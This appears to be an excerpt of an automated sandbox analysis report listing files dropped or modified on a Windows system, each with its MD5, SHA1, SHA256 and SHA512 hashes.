C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML
| MD5 | 5433eab10c6b5c6d55b7cbd302426a39 |
| SHA1 | c5b1604b3350dab290d081eecd5389a895c58de5 |
| SHA256 | 23dbf7014e99e93af5f2760f18ee1370274f06a453145c8d539b66d798dad131 |
| SHA512 | 207b40d6bec65ab147f963a5f42263ae5bf39857987b439a4fa1647bf9b40e99cdc43ff68b7e2463aa9a948284126ac3c9c7af8350c91134b36d8b1a9c61fd34 |
C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak
| MD5 | 7050d5ae8acfbe560fa11073fef8185d |
| SHA1 | 5bc38e77ff06785fe0aec5a345c4ccd15752560e |
| SHA256 | cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b |
| SHA512 | a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 19d78b1eae63fd95e33c36ae0cad7aa8 |
| SHA1 | 52bbbd1abf5e05fd11b19462a54685e7ccfc2d4b |
| SHA256 | 50c2e86388d63a5a5a2052f9866083e8784c3eed266f9b947b4f5772e5fbcf80 |
| SHA512 | 34d6dd06fc41e2a3bf026cc58e461cf12064eab6969225d118b786aaacfabaac8bd7cbc6c26ad2c985faa04f0a07a4134119d4780c9189ded6db3d0fe9b59454 |
C:\Users\Admin\Desktop\69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 69 5.txt
| MD5 | a6ef45b0aa8443dfea5daaa1bac6a671 |
| SHA1 | b27edc165fd8c892af4442698e623d14dfa87899 |
| SHA256 | 6ba4272a0155f90dc9ffb4777d0e6d167372dfba847992ba77b6ebfb7d234ac2 |
| SHA512 | 13762ea017e67b1a5d42684ad149bc7aa32c0dad80bd287868ba401d44bfbe5c13ec1ee7d0ffcbcd88abfebe38bf1e8f9a5142297d5860ddbd7466d619a7b1de |
C:\PerfLogs\windows\tape.mp4
| MD5 | 3784764b2a5db2e23e744eaff79f40c8 |
| SHA1 | 33994de53dcf82b834961421b863181763166954 |
| SHA256 | 2234a0715ed3fc817cfd2ef5c065e26003620b68a66a4598a3ab599cdd5f50bf |
| SHA512 | f263f3f66e61bb7309e688e259db6111eb052a9fb494848b9763baecf2e8a1523adb2fa6c226950c871c7ce65194c4436622e689b09cb0d5d9693bff99a40a9f |
C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb
| MD5 | 392555a30fb8725db31c677294ee5990 |
| SHA1 | c8e83f325b6db18a4a129e95a1842e692a6d7e35 |
| SHA256 | 7d47273289d34dd052a55ecd9fef4fafcfb6a1577246b462ba8a115ec5f6a697 |
| SHA512 | e9c2578cb8d67738b586dcb547b6d0f1bd2250c372d252d46b0e2a6363c5cc9748321ad8a99cf04a30366cf674e98c0e3a94583629039898dd232aadca4d1dae |